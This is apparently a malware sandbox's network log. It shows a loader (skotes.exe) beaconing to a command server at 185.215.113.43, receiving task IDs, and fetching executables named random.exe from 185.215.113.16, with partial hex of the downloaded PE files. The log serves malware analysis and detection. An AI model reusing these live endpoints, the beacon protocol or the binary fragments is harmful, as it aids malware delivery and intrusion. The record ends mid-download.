                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:27.151801109 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:28.499929905 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          122192.168.2.450201185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:30.243794918 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:31.696849108 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:31 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          123192.168.2.450202185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:33.322308064 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:34.769323111 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:34 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          124192.168.2.450203185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:36.526187897 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:37.857939959 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:37 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          125192.168.2.450204185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:39.493805885 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:40.980731964 CET379INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:40 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 62 64 0d 0a 20 3c 63 3e 31 30 31 37 36 33 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 37 36 33 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: bd <c>1017631001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1017632001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#<d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          126192.168.2.450205185.215.113.16806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:41.113671064 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.452156067 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:41 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 1865216
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 12:39:15 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "676413f3-1c7600"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 04 a2 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gI@J@T0h 1 H@.rsrc X@.idata 0Z@ *@\@jxigntbe/^@dmgkcopcIP@.taggant0I"T@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.452246904 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.452258110 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.452438116 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.452451944 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.452852011 CET1236INData Raw: 03 c2 31 ba a0 e7 2b 28 78 b4 fd 92 fe ac 0a a1 91 a8 94 82 3a 9d df 98 39 cb 60 b1 75 4f cd 72 ba b7 08 ce fa 30 6c de 54 c3 3e 23 75 ff a6 43 f5 76 db 9e 2b 01 27 ad 52 17 20 0b bb 9d c6 92 18 1c b6 dd 86 e6 fc 22 22 11 fa cc 25 41 d3 aa c8 af
                                                                                                                                                                                                                                                          Data Ascii: 1+(x:9`uOr0lT>#uCv+'R ""%AKWk69u("!j(5npidsKED*xda[a|=0~|;}GhnSd30eZrtIlQRz0o}y]F1$vcI3n'I
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.452863932 CET1236INData Raw: af c1 b0 8b b8 e2 44 86 7a 40 08 71 10 48 27 a1 85 fc 23 e7 db 92 0e 50 b0 fb 0a 78 83 af 01 88 e0 0c ed bd cd cd f4 c4 79 3c 79 9d 5b bd fe 52 f0 c9 32 ce 79 d7 ef 94 9a bd 00 8d ed de d3 c0 16 6e a9 ab f0 56 99 1a 6e c9 d0 8e 0a 65 f1 fa 55 62
                                                                                                                                                                                                                                                          Data Ascii: Dz@qH'#Pxy<y[R2ynVneUbu}S}t!PEwI1AKZntsLW"@mu^]Su/aNn>aq.}Y~Gb}O7E
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.452877045 CET1236INData Raw: 62 ad 0d 74 79 14 8e 6e 1a 62 ff 83 25 15 0e 89 29 c9 f7 46 78 03 a8 be 80 bd e7 a4 1c d5 3e 40 30 87 01 86 76 fb 34 8b ed 3f ec 94 06 2b d7 5f ae ac 3d 12 78 35 ac 59 ca b0 f2 ff 6e 38 61 4a 92 a0 0c 98 aa 54 df 9a 12 b2 fd 90 28 35 ef fa 8e bc
                                                                                                                                                                                                                                                          Data Ascii: btynb%)Fx>@0v4?+_=x5Yn8aJT(5J3=MwoKx)hK".9>LcT97JK(]rx>C/Ka.]}j`G[13v_284k{g,1s7>q5
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.453279018 CET1236INData Raw: 49 88 01 be 21 b7 fb 0c 08 9e 54 08 7c 84 22 4a b5 dc af 14 07 db 04 8c bb 03 23 51 48 a3 02 14 d7 d1 00 b4 d9 23 e7 87 2b c0 69 6a 69 34 51 cc f5 c3 8c 62 6c 42 fd b3 b3 36 cb 19 7c 49 ff 0c be de 87 8a c1 94 65 ad 89 52 74 8d a4 e1 a7 77 fe 7d
                                                                                                                                                                                                                                                          Data Ascii: I!T|"J#QH#+iji4QblB6|IeRtw}oe*Y:~;Wt<M)DYl}(0ip.O3O+9#z)kI;i(UqZ*qhf$-6<gjjn}$Hywug~lD7Q
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.453290939 CET1236INData Raw: 6b 13 56 ee 6d bc c1 a5 92 e8 08 8c 20 59 26 2d ef 27 11 8e 21 bc 52 12 88 c8 fe b0 09 60 25 9c 78 3c 58 2a 9f 71 6d 51 f3 c5 e9 04 f6 3c 08 b4 29 e7 1c f4 29 28 aa 92 51 bc 21 51 70 24 37 ae 7b ab 2e 93 2c 84 54 a3 7e 9e 28 94 b5 9b bc 4f 74 44
                                                                                                                                                                                                                                                          Data Ascii: kVm Y&-'!R`%x<X*qmQ<))(Q!Qp$7{.,T~(OtDa#qplW\/l`fyf7(jyQMyr<8fLnEFDI:E8)I_x*q]"x~K}v;5]F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:42.572015047 CET900INData Raw: 5a d4 5c 50 42 3b 2e 91 92 5f 22 74 35 53 19 d5 19 61 3c 26 4c a0 b7 9d b0 98 ad 5c fa 40 79 e1 a9 67 7c c7 ab d4 0a e7 06 cb 18 d4 e5 3e 76 f7 bb 9d d6 e2 75 c5 71 97 4b b9 8b 84 7c 43 e1 ae 39 b7 51 51 c0 15 3e 95 ea 76 95 33 ec 89 c9 a2 aa 3f
                                                                                                                                                                                                                                                          Data Ascii: Z\PB;._"t5Sa<&L\@yg|>vuqK|C9QQ>v3?K)/iau+BwKRc,[:;p(=1RL9~7{21A/yV--K;i>qC#j6J0Gw?qG


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          127192.168.2.450207185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:47.993701935 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017631001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:49.338124990 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:49 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          128192.168.2.450208185.215.113.16806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:49.463402033 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.797188044 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:49 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 2940416
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 12:39:26 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "676413fe-2cde00"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 10 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 50 00 00 04 00 00 37 0d 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(P@@P7-@M$a$$ $h@.rsrc$x@.idata $z@mtxeekvl@+$<+|@yfmqoglcP,@.taggant0P",@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.797257900 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.797270060 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.797575951 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.797645092 CET1236INData Raw: 43 7d 36 e2 84 35 51 7f 45 42 92 f6 52 fa f4 9f 00 16 b9 95 84 f2 ff 65 2c fa 30 c5 20 76 29 91 14 b4 21 78 04 ac 19 a0 5f 50 0c 24 66 dc f7 71 7c da 09 76 78 6a f9 b1 50 fa ec 4e eb 0b e1 3e 41 fe d4 4d 39 78 29 76 43 22 fd cd 28 1a b9 76 06 db
                                                                                                                                                                                                                                                          Data Ascii: C}65QEBRe,0 v)!x_P$fq|vxjPN>AM9x)vC"(vlSGG"FSeG*:72sw=~*T6x}} 5H-xT+XYI.9b4fyuP"{Z8%Dcq\)`4q!hQ]eifQ6r}@<
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.797657967 CET1236INData Raw: 16 d2 f7 39 22 ea 2d 7f 41 fb 3b d3 ac 2f 8e e7 75 12 75 2f 13 da c4 66 cb d9 d4 09 12 0a 68 47 b8 54 ba 34 09 59 98 a6 67 4d d1 f7 dc 51 b9 a1 2f 8d ba 10 ea 31 54 a6 0b 95 bf 5f 73 fc 06 e9 c8 43 f6 15 89 69 ba c4 70 6b f7 f0 50 5a b9 e2 91 f9
                                                                                                                                                                                                                                                          Data Ascii: 9"-A;/uu/fhGT4YgMQ/1T_sCipkPZ^q^%% d7ELP<Uw)@"pY}}iB"rgjvIU*-"w*e8SOHf<|m(!3mB]%ZZ=zegnH7Q.+4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.797668934 CET1236INData Raw: 42 45 21 e2 16 72 d2 0d 89 04 bf 6e 11 13 72 60 16 96 c2 f5 41 63 a9 7b 52 34 69 6f c4 fa d4 fd 58 d4 ce 03 ca 42 81 74 dc 76 d3 75 8c 37 7d b7 0e e0 3f 77 08 12 45 92 71 06 64 7b e2 b6 c9 7d 4a 1a c7 71 bc 63 d9 fa 16 bc 09 96 16 02 01 e2 2c 7b
                                                                                                                                                                                                                                                          Data Ascii: BE!rnr`Ac{R4ioXBtvu7}?wEqd{}Jqc,{H-j5c"9{gBQ4P/~|ZwrU!o~G>z~e$v1eJL}n|wb;[V(|!@rJyIt;r[*#B &4o@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.798268080 CET1000INData Raw: 08 2d c7 9a a2 1e 99 ea 89 99 b9 79 a3 79 9d a8 50 08 c1 c1 88 83 fc 62 09 62 b9 73 80 37 11 66 6e 6d 52 e5 10 03 f1 76 a4 76 f3 71 29 54 22 72 b8 08 d2 29 09 0a 3c ee 4c 86 1a 86 e0 08 f3 59 12 a2 3e 87 36 4d b9 75 2d 8f d9 bf 50 46 22 7e a4 34
                                                                                                                                                                                                                                                          Data Ascii: -yyPbbs7fnmRvvq)T"r)<LY>6Mu-PF"~4>5@4HmA4q2;-06"obERt5ds@Qt <J4 ymD~<m!F?QB4)>!4$gm|-6i{Y%=2?v8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.798280001 CET1236INData Raw: 19 ff 67 39 29 72 ca 9f 8c 03 d1 e8 70 7c fa 45 99 34 c7 05 11 2e 3f e6 ea fe 36 a0 b8 13 79 66 b0 7b 42 32 7b 5b 15 cb a5 f5 88 66 1b de 36 46 bf fe 3d 72 c1 2b c4 71 ac 3c 81 cf 09 9a bd 76 d7 1a f3 73 30 03 7d 66 92 7c c2 e4 4d 36 8e 66 19 7a
                                                                                                                                                                                                                                                          Data Ascii: g9)rp|E4.?6yf{B2{[f6F=r+q<vs0}f|M6fz*j]9"\:{z#5T{f`YcRtXB+Vu<iB5Mw4%o}-VArJ'v$MC5qwB/4SRtqG
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.798291922 CET1236INData Raw: dd 2e f3 d1 44 3b 21 a2 8b b9 35 c2 58 a2 fa 7f 4a 20 c5 89 21 a3 d1 fa 22 56 fb ad 70 08 25 fe 6e 8d b4 ee 0e 37 2d 66 19 7a f6 25 0b 37 33 8d 44 86 d3 fd 10 82 3a e7 6c 3a c7 09 85 34 69 7f 10 02 07 e9 15 fa d5 73 10 ce 39 16 45 32 d5 1f 9c e6
                                                                                                                                                                                                                                                          Data Ascii: .D;!5XJ !"Vp%n7-fz%73D:l:4is9E25to*7=n`)8{zq"sq<v!z;pBF9|?!<$R4Rv)(:tq=J9KCJ(:IIvan2qLVm:u<
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:50.916982889 CET1236INData Raw: 01 e0 74 f6 10 3a 89 67 a5 9d e3 cc c0 e7 4f f4 90 85 66 23 06 ad f4 93 07 e5 1e 8a 10 ca 18 b8 be f8 36 4e 82 93 90 9f 07 7f 1d d0 97 06 46 c2 06 08 f6 05 33 74 b4 e0 06 43 03 86 61 e2 07 49 44 e6 61 aa 82 53 c1 c5 03 57 f7 29 82 89 65 e8 10 47
